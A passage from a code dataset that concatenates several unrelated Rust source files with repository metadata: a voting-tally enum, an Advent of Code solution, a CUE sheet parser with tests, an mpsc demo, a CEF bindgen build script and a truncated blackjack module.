the number of points given for a voter's first and subsequent preferences is determined by the total number of candidates they have actually ranked, rather than the total number listed. /// This is to say, typically, on a ballot of `n` candidates, if a voter casts only `m` preferences (where `n ≥ m ≥ 1`), a first preference gets `m` points, a second preference `m – 1` points, and so on. /// Modified Borda counts are used to counteract the problem of [bullet voting](https://en.wikipedia.org/wiki/Bullet_voting). /// Each candidate is given points according to: /// /// ```number-marked - candidate-position``` /// /// For BordaModifiedClassic tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. BordaModifiedClassic, /// The Schulze method is an voting system that selects a single winner using votes that express preferences. /// In SchulzeWinning Strength of a link is measured by its support. 
You should use this Schulze variant if you are unsure. /// /// For SchulzeWinning tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. SchulzeWinning, /// The Schulze method is an voting system that selects a single winner using votes that express preferences. /// In SchulzeRatio, the strength of a link is measured by the difference between its support and opposition. /// /// For SchulzeRatio tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. SchulzeRatio, /// The Schulze method is an voting system that selects a single winner using votes that express preferences. /// In SchulzeMargin, the strength of a link is measured by the ratio of its support and opposition. /// /// For SchulzeMargin tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. SchulzeMargin, } #[derive(Serialize, Deserialize, Clone, Message, PartialEq, Eq)] pub struct Selection { /// true if the `selection` field is a free-form write-in, false if the `selection` field corresponds to a known candidate-id #[prost(bool)] #[serde(default)] pub write_in: bool, /// Score has different meanings depending on the tally type: /// STV, Condorcet, Borda and Schulze: `score` means candidate rank, where a zero is the best rank that can be assigned to a candidate. /// Score: `score` is the points assinged to this candidate. Zero is the worst score that can be asssigned to a candidate. /// Plurality, Approval, and InstantRunoff: `score` is meaningless and has no effect. #[prost(uint32)] #[serde(default)] pub score: u32, /// Known candidate-id or free-form text, depending on the value of the `write_in` field. #[prost(string)] pub selection: String, } impl Into<(String, u64)> for Selection { fn into(self) -> (String, u64) { (self.selection, self.score as u64) } } impl Into<(String, u32)> for Selection { fn into(self) -> (String, u32) { (self.selection, self.score) } }
download_success: true

blob_id: d6d6c662d018baebd23e5bfde9bd3daedf53804b
language: Rust
repo_name: Lakret/aoc2020
path: /src/d06.rs
src_encoding: UTF-8
length_bytes: 1,533
score: 3.40625
int_score: 3
detected_licenses: []
license_type: no_license
text:
use std::collections::HashSet; pub fn solve(input: &str) -> Option<Box<usize>> { let sum_of_counts = input .trim_end() .split("\n\n") .map(|group| group.chars().filter(|ch| *ch != '\n').collect::<HashSet<_>>().len()) .sum(); Some(Box::new(sum_of_counts)) } pub fn solve2(input: &str) -> Option<Box<usize>> { let sum_of_counts = input .trim_end() .split("\n\n") .map(|group| { let answers_per_person = group .split_ascii_whitespace() .map(|person| person.chars().collect::<HashSet<_>>()) .collect::<Vec<_>>(); answers_per_person .iter() .fold(answers_per_person[0].clone(), |all_yes, persons_answers| { all_yes.intersection(persons_answers).cloned().collect() }) .len() }) .sum(); Some(Box::new(sum_of_counts)) } #[cfg(test)] mod tests { use super::*; use std::fs; #[test] fn part_one_works_with_sample() { let input = fs::read_to_string("inputs/sample06").unwrap(); assert_eq!(solve(&input), Some(Box::new(11))); } #[test] fn part_two_works_with_sample() { let input = fs::read_to_string("inputs/sample06").unwrap(); assert_eq!(solve2(&input), Some(Box::new(6))); } #[test] fn part_one_solved() { let input = fs::read_to_string("inputs/d06").unwrap(); assert_eq!(solve(&input), Some(Box::new(6504))) } #[test] fn part_two_solved() { let input = fs::read_to_string("inputs/d06").unwrap(); assert_eq!(solve2(&input), Some(Box::new(3351))) } }
download_success: true

blob_id: bc4a024fabc61af2ce4d81df31164215a66913be
language: Rust
repo_name: gyng/rcue
path: /src/parser.rs
src_encoding: UTF-8
length_bytes: 20,090
score: 2.890625
int_score: 3
detected_licenses: [ "MIT" ]
license_type: permissive
text:
use std::env; use std::fs::File; use std::io::{BufRead, BufReader}; use cue::{Command, Cue, CueFile, Track}; use errors::CueError; use util::{next_string, next_token, next_values, timestamp_to_duration}; /// Parses a CUE file at `path` into a [`Cue`](struct.Cue.html) struct. /// /// Strict mode (`strict: true`) will return a [`CueError`](../errors/enum.CueError.html) if invalid fields or extra lines are detected. /// When not in strict mode, bad lines and fields will be skipped, and unknown /// fields will be stored in [`Cue.unknown`](struct.Cue.html). /// /// # Example /// /// ``` /// use rcue::parser::parse_from_file; /// /// let cue = parse_from_file("test/fixtures/unicode.cue", true).unwrap(); /// assert_eq!(cue.title, Some("マジコカタストロフィ".to_string())); /// ``` /// /// # Failures /// /// Fails if the CUE file can not be parsed from the file. #[allow(dead_code)] pub fn parse_from_file(path: &str, strict: bool) -> Result<Cue, CueError> { let file = File::open(path)?; let mut buf_reader = BufReader::new(file); parse(&mut buf_reader, strict) } /// Parses a [`BufRead`](https://doc.rust-lang.org/std/io/trait.BufRead.html) into a [`Cue`](struct.Cue.html) struct. /// /// Strict mode will return [`CueError`](../errors/enum.CueError.html) if invalid fields or extra lines are detected. /// When not in strict mode, bad lines and fields will be skipped, and unknown /// fields will be stored in [`Cue.unknown`](struct.Cue.html). /// /// # Example /// /// ``` /// use rcue::parser::parse; /// use std::fs::File; /// use std::io::BufReader; /// /// let file = File::open("test/fixtures/unicode.cue").unwrap(); /// let mut buf_reader = BufReader::new(file); /// let cue = parse(&mut buf_reader, true).unwrap(); /// assert_eq!(cue.title, Some("マジコカタストロフィ".to_string())); /// ``` /// /// # Failures /// /// Fails if the CUE file can not be parsed. #[allow(dead_code)] pub fn parse(buf_reader: &mut dyn BufRead, strict: bool) -> Result<Cue, CueError> { let verbose = env::var_os("RCUE_LOG").map(|s| s == "1").unwrap_or(false); macro_rules! 
fail_if_strict { ($line_no:ident, $line:ident, $reason:expr) => { if strict { if verbose { println!( "Strict mode failure: did not parse line {}: {}\n\tReason: {:?}", $line_no + 1, $line, $reason ); } return Err(CueError::Parse(format!("strict mode failure: {}", $reason))); } }; } let mut cue = Cue::new(); fn last_file(cue: &mut Cue) -> Option<&mut CueFile> { cue.files.last_mut() } fn last_track(cue: &mut Cue) -> Option<&mut Track> { last_file(cue).and_then(|f| f.tracks.last_mut()) } for (i, line) in buf_reader.lines().enumerate() { if let Ok(ref l) = line { let token = tokenize_line(l); match token { Ok(Command::CdTextFile(path)) => { cue.cd_text_file = Some(path); } Ok(Command::Flags(flags)) => { if last_track(&mut cue).is_some() { last_track(&mut cue).unwrap().flags = flags; } else { fail_if_strict!(i, l, "FLAG assigned to no TRACK"); } } Ok(Command::Isrc(isrc)) => { if last_track(&mut cue).is_some() { last_track(&mut cue).unwrap().isrc = Some(isrc); } else { fail_if_strict!(i, l, "ISRC assigned to no TRACK"); } } Ok(Command::Rem(field, value)) => { let comment = (field, value); if last_track(&mut cue).is_some() { last_track(&mut cue).unwrap().comments.push(comment); } else if last_file(&mut cue).is_some() { last_file(&mut cue).unwrap().comments.push(comment); } else { cue.comments.push(comment); } } Ok(Command::File(file, format)) => { cue.files.push(CueFile::new(&file, &format)); } Ok(Command::Track(idx, mode)) => { if let Some(file) = last_file(&mut cue) { file.tracks.push(Track::new(&idx, &mode)); } else { fail_if_strict!(i, l, "TRACK assigned to no FILE"); } } Ok(Command::Title(title)) => { if last_track(&mut cue).is_some() { last_track(&mut cue).unwrap().title = Some(title); } else { cue.title = Some(title) } } Ok(Command::Performer(performer)) => { // this double check might be able to go away under non-lexical lifetimes if last_track(&mut cue).is_some() { last_track(&mut cue).unwrap().performer = Some(performer); } else { cue.performer = Some(performer); } } Ok(Command::Songwriter(songwriter)) => { if last_track(&mut cue).is_some() { last_track(&mut cue).unwrap().songwriter = Some(songwriter); } else { cue.songwriter = Some(songwriter); } } Ok(Command::Index(idx, time)) => { if let Some(track) = last_track(&mut cue) { if let Ok(duration) = timestamp_to_duration(&time) { track.indices.push((idx, duration)); } else { fail_if_strict!(i, l, "bad INDEX timestamp"); } } else { fail_if_strict!(i, l, "INDEX assigned to no track"); } } Ok(Command::Pregap(time)) => { if last_track(&mut cue).is_some() { if let Ok(duration) = timestamp_to_duration(&time) { last_track(&mut cue).unwrap().pregap = Some(duration); } else { fail_if_strict!(i, l, "bad PREGAP timestamp"); } } else { fail_if_strict!(i, l, "PREGAP assigned to no track"); } } Ok(Command::Postgap(time)) => { if last_track(&mut cue).is_some() { if let Ok(duration) = timestamp_to_duration(&time) { last_track(&mut cue).unwrap().postgap = Some(duration); } else { fail_if_strict!(i, l, "bad PREGAP timestamp"); } } else { fail_if_strict!(i, l, "POSTGAP assigned to no track"); } } Ok(Command::Catalog(id)) => { cue.catalog = Some(id); } Ok(Command::Unknown(line)) => { fail_if_strict!(i, l, &format!("unknown token -- {}", &line)); if last_track(&mut cue).is_some() { last_track(&mut cue).unwrap().unknown.push(line); } else { cue.unknown.push(line) } } _ => { fail_if_strict!(i, l, &format!("bad line -- {:?}", &line)); if verbose { println!("Bad line - did not parse line {}: {:?}", i + 1, l); } } } } } Ok(cue) } #[allow(dead_code)] fn 
tokenize_line(line: &str) -> Result<Command, CueError> { let mut chars = line.trim().chars(); let command = next_token(&mut chars); let command = if command.is_empty() { None } else { Some(command) }; match command { Some(c) => match c.to_uppercase().as_ref() { "REM" => { let key = next_token(&mut chars); let val = next_string(&mut chars, "missing REM value")?; Ok(Command::Rem(key, val)) } "CATALOG" => { let val = next_string(&mut chars, "missing CATALOG value")?; Ok(Command::Catalog(val)) } "CDTEXTFILE" => { let val = next_string(&mut chars, "missing CDTEXTFILE value")?; Ok(Command::CdTextFile(val)) } "TITLE" => { let val = next_string(&mut chars, "missing TITLE value")?; Ok(Command::Title(val)) } "FILE" => { let path = next_string(&mut chars, "missing path for FILE")?; let format = next_token(&mut chars); Ok(Command::File(path, format)) } "FLAGS" => { let flags = next_values(&mut chars); Ok(Command::Flags(flags)) } "ISRC" => { let val = next_token(&mut chars); Ok(Command::Isrc(val)) } "PERFORMER" => { let val = next_string(&mut chars, "missing PERFORMER value")?; Ok(Command::Performer(val)) } "SONGWRITER" => { let val = next_string(&mut chars, "missing SONGWRITER value")?; Ok(Command::Songwriter(val)) } "TRACK" => { let val = next_token(&mut chars); let mode = next_token(&mut chars); Ok(Command::Track(val, mode)) } "PREGAP" => { let val = next_token(&mut chars); Ok(Command::Pregap(val)) } "POSTGAP" => { let val = next_token(&mut chars); Ok(Command::Postgap(val)) } "INDEX" => { let val = next_token(&mut chars); let time = next_token(&mut chars); Ok(Command::Index(val, time)) } _ => { let rest: String = chars.collect(); if rest.is_empty() { Ok(Command::None) } else { Ok(Command::Unknown(line.to_string())) } } }, _ => Ok(Command::None), } } #[cfg(test)] mod tests { use super::*; use std::time::Duration; #[test] fn test_parsing_good_cue() { let cue = parse_from_file("test/fixtures/good.cue", true).unwrap(); assert_eq!(cue.comments.len(), 4); assert_eq!( cue.comments[0], ("GENRE".to_string(), "Alternative".to_string(),) ); assert_eq!(cue.comments[1], ("DATE".to_string(), "1991".to_string())); assert_eq!( cue.comments[2], ("DISCID".to_string(), "860B640B".to_string(),) ); assert_eq!( cue.comments[3], ("COMMENT".to_string(), "ExactAudioCopy v0.95b4".to_string(),) ); assert_eq!(cue.performer, Some("My Bloody Valentine".to_string())); assert_eq!(cue.songwriter, Some("foobar".to_string())); assert_eq!(cue.title, Some("Loveless".to_string())); assert_eq!(cue.cd_text_file, Some("./cdtextfile".to_string())); assert_eq!(cue.files.len(), 1); let file = &cue.files[0]; assert_eq!(file.file, "My Bloody Valentine - Loveless.wav"); assert_eq!(file.format, "WAVE"); assert_eq!(file.tracks.len(), 2); let track = &file.tracks[0]; assert_eq!(track.no, "01".to_string()); assert_eq!(track.format, "AUDIO".to_string()); assert_eq!(track.songwriter, Some("barbaz bax".to_string())); assert_eq!(track.title, Some("Only Shallow".to_string())); assert_eq!(track.performer, Some("My Bloody Valentine".to_string())); assert_eq!(track.indices.len(), 1); assert_eq!(track.indices[0], ("01".to_string(), Duration::new(0, 0))); assert_eq!(track.isrc, Some("USRC17609839".to_string())); assert_eq!(track.flags, vec!["DCP", "4CH", "PRE", "SCMS"]); } #[test] fn test_parsing_unicode() { let cue = parse_from_file("test/fixtures/unicode.cue", true).unwrap(); assert_eq!(cue.title, Some("マジコカタストロフィ".to_string())); } #[test] fn test_case_sensitivity() { let cue = parse_from_file("test/fixtures/case_sensitivity.cue", true).unwrap(); 
assert_eq!(cue.title, Some("Loveless".to_string())); assert_eq!(cue.performer, Some("My Bloody Valentine".to_string())); } #[test] fn test_bad_intentation() { let cue = parse_from_file("test/fixtures/bad_indentation.cue", true).unwrap(); assert_eq!(cue.title, Some("Loveless".to_string())); assert_eq!(cue.files.len(), 1); assert_eq!(cue.files[0].tracks.len(), 2); assert_eq!( cue.files[0].tracks[0].title, Some("Only Shallow".to_string()) ); } #[test] fn test_unknown_field_lenient() { let cue = parse_from_file("test/fixtures/unknown_field.cue", false).unwrap(); assert_eq!(cue.unknown[0], "FOO WHAT 12345"); } #[test] fn test_unknown_field_strict() { let cue = parse_from_file("test/fixtures/unknown_field.cue", true); assert!(cue.is_err()); } #[test] fn test_empty_lines_lenient() { let cue = parse_from_file("test/fixtures/empty_lines.cue", false).unwrap(); assert_eq!(cue.comments.len(), 4); assert_eq!(cue.files.len(), 1); assert_eq!(cue.files[0].tracks.len(), 2); } #[test] fn test_empty_lines_strict() { let cue = parse_from_file("test/fixtures/empty_lines.cue", true); assert!(cue.is_err()); } #[test] fn test_duplicate_comment() { let cue = parse_from_file("test/fixtures/duplicate_comment.cue", true).unwrap(); assert_eq!(cue.comments.len(), 5); assert_eq!(cue.comments[1], ("DATE".to_string(), "1991".to_string())); assert_eq!(cue.comments[2], ("DATE".to_string(), "1992".to_string())); } #[test] fn test_duplicate_title() { let cue = parse_from_file("test/fixtures/duplicate_title.cue", true).unwrap(); assert_eq!(cue.title, Some("Loveless 2".to_string())); } #[test] fn test_duplicate_track() { let cue = parse_from_file("test/fixtures/duplicate_track.cue", true).unwrap(); assert_eq!(cue.files[0].tracks[0], cue.files[0].tracks[1]); } #[test] fn test_duplicate_file() { let cue = parse_from_file("test/fixtures/duplicate_file.cue", true).unwrap(); assert_eq!(cue.files.len(), 2); assert_eq!(cue.files[0], cue.files[1]); } #[test] fn test_bad_index_lenient() { let cue = parse_from_file("test/fixtures/bad_index.cue", false).unwrap(); assert_eq!(cue.files[0].tracks[0].indices.len(), 0); } #[test] fn test_bad_index_strict() { let cue = parse_from_file("test/fixtures/bad_index.cue", true); assert!(cue.is_err()); } #[test] fn test_bad_index_timestamp_lenient() { let cue = parse_from_file("test/fixtures/bad_index_timestamp.cue", false).unwrap(); assert_eq!(cue.files[0].tracks[0].indices.len(), 0); } #[test] fn test_bad_index_timestamp_strict() { let cue = parse_from_file("test/fixtures/bad_index_timestamp.cue", true); assert!(cue.is_err()); } #[test] fn test_pregap_postgap() { let cue = parse_from_file("test/fixtures/pregap.cue", true).unwrap(); assert_eq!(cue.files[0].tracks[0].pregap, Some(Duration::new(1, 0))); assert_eq!(cue.files[0].tracks[0].postgap, Some(Duration::new(2, 0))); } #[test] fn test_bad_pregap_timestamp_strict() { let cue = parse_from_file("test/fixtures/bad_pregap_timestamp.cue", true); assert!(cue.is_err()); } #[test] fn test_bad_pregap_timestamp_lenient() { let cue = parse_from_file("test/fixtures/bad_pregap_timestamp.cue", false).unwrap(); assert!(cue.files[0].tracks[0].pregap.is_none()); } #[test] fn test_bad_postgap_timestamp_strict() { let cue = parse_from_file("test/fixtures/bad_postgap_timestamp.cue", true); assert!(cue.is_err()); } #[test] fn test_bad_postgap_timestamp_lenient() { let cue = parse_from_file("test/fixtures/bad_postgap_timestamp.cue", false).unwrap(); assert!(cue.files[0].tracks[0].postgap.is_none()); } #[test] fn test_catalog() { let cue = 
parse_from_file("test/fixtures/catalog.cue", true).unwrap(); assert_eq!(cue.catalog, Some("TESTCATALOG-ID 64".to_string())); } #[test] fn test_comments() { let cue = parse_from_file("test/fixtures/comments.cue", true).unwrap(); assert_eq!(cue.comments.len(), 4); assert_eq!(cue.files[0].comments.len(), 1); assert_eq!(cue.files[0].tracks[0].comments.len(), 1); assert_eq!(cue.files[0].tracks[1].comments.len(), 2); assert_eq!( cue.files[0].tracks[1].comments[0], ("TRACK".to_string(), "2".to_string(),) ); assert_eq!( cue.files[0].tracks[1].comments[1], ("TRACK".to_string(), "2.1".to_string(),) ); } #[test] fn test_orphan_track_strict() { let cue = parse_from_file("test/fixtures/orphan_track.cue", true); assert!(cue.is_err()); } #[test] fn test_orphan_track_lenient() { let cue = parse_from_file("test/fixtures/orphan_track.cue", false).unwrap(); assert_eq!(cue.files.len(), 0); } #[test] fn test_orphan_index_strict() { let cue = parse_from_file("test/fixtures/orphan_index.cue", true); assert!(cue.is_err()); } #[test] fn test_orphan_index_lenient() { let cue = parse_from_file("test/fixtures/orphan_index.cue", false).unwrap(); assert_eq!(cue.files[0].tracks.len(), 1); assert_eq!(cue.files[0].tracks[0].indices.len(), 1); assert_eq!( cue.files[0].tracks[0].indices[0], ("01".to_string(), Duration::new(257, 693333333,),) ); } #[test] fn test_orphan_pregap_strict() { let cue = parse_from_file("test/fixtures/orphan_pregap.cue", true); assert!(cue.is_err()); } #[test] fn test_orphan_pregap_lenient() { let cue = parse_from_file("test/fixtures/orphan_pregap.cue", false).unwrap(); assert_eq!(cue.files[0].tracks.len(), 1); assert!(cue.files[0].tracks[0].pregap.is_none()); } #[test] fn test_orphan_postgap_strict() { let cue = parse_from_file("test/fixtures/orphan_postgap.cue", true); assert!(cue.is_err()); } #[test] fn test_orphan_postgap_lenient() { let cue = parse_from_file("test/fixtures/orphan_postgap.cue", false).unwrap(); assert_eq!(cue.files[0].tracks.len(), 1); assert!(cue.files[0].tracks[0].pregap.is_none()); } #[test] fn test_missing_file() { let cue = parse_from_file("test/fixtures/missing.cue.missing", true); assert!(cue.is_err()); } #[test] fn test_bare_file() { use std::io; assert!(parse(&mut io::Cursor::new(b"FILE"), true).is_err()); } }
download_success: true

blob_id: 0b65979d722623554e3a4b08e49d3802e46553be
language: Rust
repo_name: Excloudx6/freq-word-counter-rust
path: /src/utils/traverse.rs
src_encoding: UTF-8
length_bytes: 6,161
score: 3
int_score: 3
detected_licenses: [ "Apache-2.0", "MIT" ]
license_type: permissive
text:
use anyhow::Result; use serde::Serialize; use std::fmt::Display; use std::path::PathBuf; const STDIN: &str = "-"; #[derive(Debug, Clone, PartialEq, Eq, Hash)] #[non_exhaustive] pub enum Input { FsGlob { pattern: String, ignore_case: bool }, FsPath(PathBuf), Stdin, String(String), } impl Serialize for Input { fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error> where S: serde::Serializer, { serializer.collect_str(self) } } impl Display for Input { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { Input::FsGlob { pattern, ignore_case: _, } => { write!(f, "{}", pattern) } Input::FsPath(path) => { write!(f, "{}", path.to_str().unwrap_or_default()) } Input::Stdin => { write!(f, "stdin") } Input::String(_) => { write!(f, "raw input string") } } } } impl Input { pub fn new(value: &str, glob_ignore_case: bool) -> Self { if value == STDIN { Self::Stdin } else { let is_glob = glob::Pattern::escape(value) != value; if is_glob { Self::FsGlob { pattern: value.to_owned(), ignore_case: glob_ignore_case, } } else { Self::FsPath(value.into()) } } } // pub async fn get_contents( // &self, // file_type_hint: Option<FileType>, // skip_missing: bool, // ) -> Result<Vec<InputContent>> { // use Input::*; // match self { // // TODO: should skip_missing also affect URLs? // RemoteUrl(url) => Ok(vec![Self::url_contents(url).await?]), // FsGlob { // pattern, // ignore_case, // } => Ok(Self::glob_contents(pattern, *ignore_case).await?), // FsPath(path) => { // let content = Self::path_content(&path).await.with_context(|| { // format!( // "Failed to read file: `{}`", // path.to_str().unwrap_or("<MALFORMED PATH>") // ) // }); // match content { // Ok(input_content) => Ok(vec![input_content]), // Err(_) if skip_missing => Ok(vec![]), // Err(arg) => Err(anyhow!(arg)), // } // } // Stdin => Ok(vec![Self::stdin_content(file_type_hint).await?]), // String(s) => Ok(vec![Self::string_content(s, file_type_hint)]), // } // } } // TODO: Make that a stream of files? // async fn glob_contents(path_glob: &str, ignore_case: bool) -> Result<Vec<Input>> { // let mut contents = vec![]; // let glob_expanded = tilde(&path_glob); // let mut match_opts = glob::MatchOptions::new(); // match_opts.case_sensitive = !ignore_case; // for entry in glob_with(&glob_expanded, match_opts)? { // match entry { // Ok(path) => { // contents.push(content); // } // Err(e) => println!("{:?}", e), // } // } // Ok(contents) // } /// Return readers for all matches from a slice of inputs // pub async fn files_stream<T: Read>(inputs: &[Input]) -> Result<HashSet<T>> { // todo!(); // // // extract input contents // // for input in inputs.iter().cloned() { // // let sender = contents_tx.clone(); // // tokio::spawn(async move { // // let contents = input.get_contents(None, skip_missing_inputs).await; // // sender.send(contents).await // // }); // // } // // // receiver will get None once all tasks are done // // drop(contents_tx); // // // extract links from input contents // // let mut extract_link_handles = vec![]; // // while let Some(result) = contents_rx.recv().await { // // for input_content in result? { // // let base_url = base_url.clone(); // // let handle = // // tokio::task::spawn_blocking(move || extract_links(&input_content, base_url)); // // extract_link_handles.push(handle); // // } // // } // // // Note: we could dispatch links to be checked as soon as we get them, // // // instead of building a HashSet with all links. 
// // // This optimization would speed up cases where there's // // // a lot of inputs and/or the inputs are large (e.g. big files). // // let mut collected_links: HashSet<Request> = HashSet::new(); // // for handle in extract_link_handles { // // let links = handle.await?; // // collected_links.extend(links); // // } // // Ok(collected_links) // } /*#[cfg(test)] mod test { use super::*; #[tokio::test] async fn test_collect_links() -> Result<()> { // let dir = tempfile::tempdir()?; // let file_path = dir.path().join("f"); // let file_glob_1_path = dir.path().join("glob-1"); // let file_glob_2_path = dir.path().join("glob-2"); // let mut file = File::create(&file_path)?; // let mut file_glob_1 = File::create(file_glob_1_path)?; // let mut file_glob_2 = File::create(file_glob_2_path)?; // let inputs = vec![ // // Input::String(TEST_STRING.to_string()), // Input::FsPath(file_path), // Input::FsGlob { // pattern: dir.path().join("glob*").to_str().unwrap().to_string(), // ignore_case: true, // }, // ]; // TODO // let found_files: HashSet<Box<Read>> = files_stream(&inputs).await?.collect(); // // let expected_files = vec![file_path, file_glob_1_path, file_glob_2_path, file, file_glob_1, file_glob_2, expected_files]; // assert_eq!(found_files, expected_files); Ok(()) } }*/
download_success: true

blob_id: 7c28e7e518c8a7bcfa68c73e2b92d34d25753221
language: Rust
repo_name: maxueshan/quick_get_start_rust
path: /src/bin/mpsc_test.rs
src_encoding: UTF-8
length_bytes: 445
score: 3.40625
int_score: 3
detected_licenses: [ "MIT" ]
license_type: permissive
text:
use std::sync::mpsc;
use std::thread;

fn main() {
    // Create a channel
    let (tx, rx): (mpsc::Sender<i32>, mpsc::Receiver<i32>) = mpsc::channel();

    // Spawn a thread to send the message
    thread::spawn(move || {
        // Send a message, in this case a numeric id
        tx.send(1).unwrap();
    });

    // Receive the child thread's message in the main thread and print it
    println!("receive {}", rx.recv().unwrap());
}
// Output: receive 1
download_success: true

blob_id: 5f0c4a3fae092772b258809a8bb279b00788fa3b
language: Rust
repo_name: peter-suggate/cef-sys
path: /build.rs
src_encoding: UTF-8
length_bytes: 5,019
score: 2.59375
int_score: 3
detected_licenses: [ "MIT" ]
license_type: permissive
text:
extern crate bindgen;

use std::env;
use std::fs;
use std::io::Write;
use std::path::PathBuf;

fn cef_dir() -> PathBuf {
    PathBuf::from(env_var("CEF_DIR"))
}

// The wrapper file is the entry point to the native code we are creating bindings for.
fn create_wrapper_file() {
    let wrapper_file = PathBuf::from(env_var("CARGO_MANIFEST_DIR")).join("wrapper.h");
    let cef_dir = cef_dir();
    if !wrapper_file.is_file() {
        let file = fs::File::create(wrapper_file).expect("Could not create wrapper.h file");
        let mut file_writer = std::io::LineWriter::new(file);
        // We want to include all capi headers
        let include_files = fs::read_dir(cef_dir.join("include").join("capi")).unwrap();
        for entry_res in include_files {
            let entry = entry_res.unwrap();
            // If it's a header, include it in the file as a string relative to cef_dir
            if entry.file_name().to_str().unwrap().ends_with(".h") {
                let relative_name = entry
                    .path()
                    .strip_prefix(&cef_dir)
                    .unwrap()
                    .to_str()
                    .unwrap()
                    .replace("\\", "/");
                writeln!(&mut file_writer, "#include \"{}\"", relative_name)
                    .expect("Could not write #include to wrapper.h");
            }
        }
    }
}

fn generate_bindings() {
    // Write the bindings to the $OUT_DIR/bindings.rs file.
    let out_path = PathBuf::from(env_var("OUT_DIR"));
    // if !out_path.is_file() {
    // The bindgen::Builder is the main entry point
    // to bindgen, and lets you build up options for
    // the resulting bindings.
    let bindings = bindgen::Builder::default()
        // The input header we would like to generate
        // bindings for.
        .header("wrapper.h")
        .clang_arg("--include-directory")
        .clang_arg(cef_dir().to_str().unwrap())
        // Some of the c api includes seem to pull in C++!
        .clang_arg("-x")
        .clang_arg("c++")
        .layout_tests(false)
        .derive_default(true)
        // TODO: waiting for fix of https://github.com/servo/rust-bindgen/issues/648
        .opaque_type("tagMONITORINFOEXA")
        .rustfmt_bindings(true)
        // Cef is huge! Pull in only the things we need or else the generated bindings is very large.
        .whitelist_function("cef_execute_process")
        .whitelist_function("cef_initialize")
        .whitelist_function("cef_do_message_loop_work")
        .whitelist_function("cef_browser_host_create_browser")
        .whitelist_function("cef_browser_host_create_browser_sync")
        .whitelist_function("cef_process_message_create")
        .whitelist_function("cef_string_utf8_to_utf16")
        .whitelist_function("cef_string_utf16_to_utf8")
        .whitelist_function("cef_v8value_create_undefined")
        .whitelist_function("cef_v8value_create_null")
        .whitelist_function("cef_v8value_create_bool")
        .whitelist_function("cef_v8value_create_int")
        .whitelist_function("cef_v8value_create_uint")
        .whitelist_function("cef_v8value_create_double")
        .whitelist_function("cef_v8value_create_date")
        .whitelist_function("cef_v8value_create_string")
        .whitelist_function("cef_v8value_create_object")
        .whitelist_function("cef_v8value_create_array")
        .whitelist_function("cef_v8value_create_array_buffer")
        .whitelist_function("cef_v8value_create_function")
        // Finish the builder and generate the bindings.
        .generate()
        // Unwrap the Result and panic on failure.
        .expect("Unable to generate bindings");
    bindings
        .write_to_file(out_path.join("bindings.rs"))
        .expect("Couldn't write bindings!");
    // }
}

enum Platform {
    Windows,
    Mac,
    Linux,
}

fn get_platform() -> Platform {
    match env::var("TARGET").unwrap().split('-').nth(2).unwrap() {
        "win32" | "windows" => Platform::Windows,
        "darwin" => Platform::Mac,
        "linux" => Platform::Linux,
        other => panic!("Sorry, platform \"{}\" is not supported by CEF.", other),
    }
}

fn get_build_type() -> String {
    match env::var("PROFILE").unwrap().as_str() {
        "release" => String::from("Release"),
        _ => String::from("Debug"),
    }
}

fn config_linker() {
    let lib_name = match get_platform() {
        Platform::Mac => return, // CEF_PATH is not necessarily needed for Mac
        Platform::Windows => "libcef",
        Platform::Linux => "cef",
    };
    // Tell the linker the lib name and the path
    println!("cargo:rustc-link-lib={}", lib_name);
    println!(
        "cargo:rustc-link-search={}",
        cef_dir().join(get_build_type()).to_str().unwrap()
    );
}

fn main() {
    create_wrapper_file();
    generate_bindings();
    config_linker();
}

fn env_var<K: AsRef<std::ffi::OsStr>>(key: K) -> String {
    env::var(&key).expect(&format!("Unable to find env var {:?}", key.as_ref()))
}
true
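The build script above writes the generated bindings to $OUT_DIR/bindings.rs; a crate consuming them would typically pull that file in with the usual bindgen include pattern sketched below. This is an illustrative sketch, not code taken from the repository.

// src/lib.rs (sketch)
#![allow(non_upper_case_globals, non_camel_case_types, non_snake_case)]

// Pull in the bindings that build.rs emitted into OUT_DIR.
include!(concat!(env!("OUT_DIR"), "/bindings.rs"));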
ce73e9123687cb380e7bb60b16e8a310d552b843
Rust
kyle-mccarthy/blackjack-rs
/src/blackjack/blackjack_hand.rs
UTF-8
8,331
3.0625
3
[]
no_license
use crate::blackjack::hand_value::{HandValue, WithHandValue}; use crate::blackjack::player::PlayerType; use crate::blackjack::wager::{Wager, WithWager}; use crate::cards::{Card, Hand}; use std::sync::Arc; pub enum HandState { Default, WagerPlaced, CardsDealt, HandPlayed, } pub enum ResultsState { Default, Natural, Pushed, Lost, Won, Busted, } // @todo likely need to split up the states even more -- consider individual wager state + pay state?? pub struct BlackjackHand { hand: Hand, player_type: PlayerType, state: HandState, result_state: ResultsState, wager: Wager, } impl BlackjackHand { pub fn new(player_type: PlayerType) -> BlackjackHand { BlackjackHand { player_type, hand: Hand::new(), state: HandState::Default, result_state: ResultsState::Default, wager: Wager::new(), } } pub fn with_cards( player_type: PlayerType, cards: Vec<Arc<Card>>, ) -> BlackjackHand { BlackjackHand { player_type, hand: Hand::with_cards(cards), state: HandState::Default, result_state: ResultsState::Default, wager: Wager::new(), } } pub fn get_state(&self) -> &HandState { &self.state } pub fn set_state(&mut self, state: HandState) { self.state = state; } pub fn add_card(&mut self, card: Arc<Card>) { self.hand.add_card(card) } pub fn add_cards(&mut self, cards: Vec<Arc<Card>>) { self.hand.add_cards(cards); } pub fn get_cards(&self) -> &Vec<Arc<Card>> { self.hand.get_cards() } pub fn get_card_count(&self) -> usize { self.hand.get_card_count() } pub fn can_split(&self) -> bool { match self.player_type { PlayerType::Dealer => false, PlayerType::Player => { self.hand.get_card_count() == 2 && self.hand.get_cards().get(0) == self.hand.get_cards().get(1) } } } pub fn split(&mut self) -> Option<[BlackjackHand; 2]> { if self.can_split() && !self.is_dealer() { let player_type = self.player_type.clone(); let cards = self.hand.get_cards(); return Some([ BlackjackHand::with_cards( player_type.clone(), vec![cards.get(0).unwrap().clone()], ), BlackjackHand::with_cards( player_type, vec![cards.get(1).unwrap().clone()], ), ]); } None } pub fn can_double_down(&self) -> bool 